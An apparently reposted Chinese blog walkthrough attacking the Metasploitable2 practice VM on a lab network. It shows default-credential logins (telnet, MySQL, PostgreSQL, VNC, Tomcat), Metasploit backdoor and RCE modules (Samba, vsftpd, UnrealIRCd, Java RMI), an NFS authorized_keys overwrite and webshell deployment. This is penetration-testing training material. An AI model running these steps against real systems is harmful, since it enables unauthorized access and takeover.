博客
关于我
Metasploitable2 靶机漏洞(上)
阅读量:162 次
发布时间:2019-02-28

本文共 2403 字,大约阅读时间需要 8 分钟。

Metasploit 攻击演示环境

##靶机信息靶机:Metasploitable2-Linux

IP:192.168.160.131

##攻击演示系统操作系统:Kali Linux 1.0.9

##漏洞一:弱密码漏洞

###漏洞分析

  • 弱密码漏洞指系统或数据库的登录用户密码过于简单或用户名与密码相同,易被暴力破解获取。

###攻击步骤

  • 在Kali中打开终端,执行以下命令:
  • telnet 192.168.160.131
    1. 输入登录名和密码,常见弱密码包括:msfadmin/msfadmin、user/user、postgres/postgres、sys/batman等。
    2. ###测试结果

      • 输入“msfadmin/msfadmin”成功登录系统,进入命令终端。
      • 输入“user/user”也可成功登录。

      ###注意事项

      • 需要尝试多次不同的弱密码组合,确保找到有效的登录账号。

      ##漏洞二:MySQL弱密码漏洞

      ###漏洞分析

      • MySQL数据库弱密码漏洞指数据库配置使用简单或已知的密码,易被破解。

      ###攻击步骤

    3. 在Kali中执行以下命令:
    4. mysql -h 192.168.160.131 -u root
      1. 输入MySQL根密码,登录成功后检查数据库状态。
      2. ###测试结果

        • 成功登录MySQL系统,查看数据库表结构和用户权限。

        ##漏洞三:PostgreSQL弱密码漏洞

        ###漏洞分析

        • PostgreSQL数据库弱密码漏洞指数据库配置使用简单或已知的密码,易被破解。

        ###攻击步骤

      3. 在Kali中执行以下命令:
      4. psql -h 192.168.160.131 -U postgres
        1. 输入密码“postgres”,登录成功后查看数据库状态。
        2. ###测试结果

          • 成功登录PostgreSQL系统,查看数据库表结构和用户权限。

          ##漏洞四:VNC弱密码漏洞

          ###漏洞分析

          • VNC远程控制软件使用简单或已知的密码,易被破解。

          ###攻击步骤

        3. 在Kali的图形界面终端中执行以下命令:
        4. vncviewer 192.168.160.131
          1. 输入密码“password”,登录成功后可远程控制靶机。
          2. ###测试结果

            • 成功登录VNC界面,获取靶机的远程控制权限。

            ##漏洞五:Samba MS-RPC Shell命令注入漏洞

            ###漏洞分析

            • Samba服务器配置问题允许远程用户通过MS-RPC注入命令,执行恶意操作。

            ###攻击步骤

          3. 在Kali中启动Metasploit:
          4. msfconsole
            1. 使用漏洞模块:
            2. use exploit/multi/samba/usermap_script
              1. 设置目标IP:
              2. set RHOST 192.168.160.131
                1. 开始攻击:
                2. exploit

                  ###测试结果

                  • 成功利用漏洞,执行命令如uname -a验证系统信息。

                  ##漏洞六:Vsftpd源码包后门漏洞

                  ###漏洞分析

                  • Vsftpd服务器特定版本存在后门漏洞,允许远程执行恶意代码。

                  ###攻击步骤

                3. 在Kali中启动Metasploit:
                4. msfconsole
                  1. 使用漏洞模块:
                  2. use exploit/unix/ftp/vsftpd_234_backdoor
                    1. 设置目标IP:
                    2. set RHOST 192.168.160.131
                      1. 开始攻击:
                      2. run

                        ###测试结果

                        • 成功获取靶机的终端控制权限。

                        ##漏洞七:UnreallRCd后门漏洞

                        ###漏洞分析

                        • UnrealIRCd服务器存在后门漏洞,允许远程执行任意命令。

                        ###攻击步骤

                      3. 在Kali中启动Metasploit:
                      4. msfconsole
                        1. 使用漏洞模块:
                        2. use exploit/unix/irc/unreal_ircd_3281_backdoor
                          1. 设置目标IP:
                          2. set RHOST 192.168.160.131
                            1. 开始攻击:
                            2. run

                              ###测试结果

                              • 成功获取靶机的终端控制权限。

                              ##漏洞八:Linux NFS共享目录配置漏洞

                              ###漏洞分析

                              • NFS共享目录配置漏洞允许攻击者修改/root/.ssh/authorized_keys,实现无密码登录。

                              ###攻击步骤

                            3. 验证NFS服务状态:
                            4. rpcinfo -p 192.168.160.131
                              1. 查看共享目录:
                              2. showmount -e 192.168.160.131
                                1. 生成SSH公钥并上传:
                                2. ssh-keygen
                                  1. 将公钥添加到靶机:
                                  2. cat /root/.ssh/id_rsa.pub > /tmp/t00l/root/.ssh/authorized_keys

                                    ###测试结果

                                    • 成功实现无密码SSH登录。

                                    ##漏洞九:Java RMI SERVER命令执行漏洞

                                    ###漏洞分析

                                    • Java RMI Server的默认配置存在漏洞,允许远程执行命令。

                                    ###攻击步骤

                                  3. 扫描目标端口:
                                  4. nmap -p 1099 192.168.160.131
                                    1. 使用Metasploit漏洞模块:
                                    2. use exploit/multi/misc/java_rmi_server
                                      1. 设置目标IP:
                                      2. set RHOST 192.168.160.131
                                        1. 开始攻击:
                                        2. run

                                          ###测试结果

                                          • 成功执行远程命令,获取靶机控制权限。

                                          ##漏洞十:Tomcat管理台默认口令漏洞

                                          ###漏洞分析

                                          • Tomcat管理台默认账户易被破解,攻击者可部署WebShell。

                                          ###攻击步骤

                                        3. 访问Tomcat管理台:
                                        4. http://192.168.160.131:8180
                                          1. 输入默认账户“tomcat/tomcat”登录。
                                          2. 准备JSP webshell文件(如liuz.jsp),将其部署到Tomcat应用目录下。
                                          3. ###测试结果

                                            • 成功登录Tomcat管理台,部署并访问WebShell,获取远程控制权限。

                                            通过以上步骤,可以对靶机进行多种攻击方式,测试系统的安全性。

    转载地址:http://yxwj.baihongyu.com/

    你可能感兴趣的文章
    Nodejs中搭建一个静态Web服务器,通过读取文件获取响应类型
    查看>>
    Nodejs中的fs模块的使用
    查看>>
    NodeJS使用淘宝npm镜像站的各种姿势
    查看>>
    NodeJs入门知识
    查看>>
    nodejs包管理工具对比:npm、Yarn、cnpm、npx
    查看>>
    NodeJs单元测试之 API性能测试
    查看>>
    nodejs图片转换字节保存
    查看>>
    nodejs在Liunx上的部署生产方式-PM2
    查看>>
    nodejs基于art-template模板引擎生成
    查看>>
    nodejs字符与字节之间的转换
    查看>>
    NodeJs学习笔记001--npm换源
    查看>>
    NodeJs学习笔记002--npm常用命令详解
    查看>>
    nodejs学习笔记一——nodejs安装
    查看>>
    vue3+Element-plus icon图标无法显示的问题(已解决)
    查看>>
    NodeJS实现跨域的方法( 4种 )
    查看>>
    nodejs封装http请求
    查看>>
    nodejs常用组件
    查看>>
    nodejs开发公众号报错 40164,白名单配置找不到,竟然是这个原因
    查看>>
    Nodejs异步回调的处理方法总结
    查看>>
    NodeJS报错 Fatal error: ENOSPC: System limit for number of file watchers reached, watch ‘...path...‘
    查看>>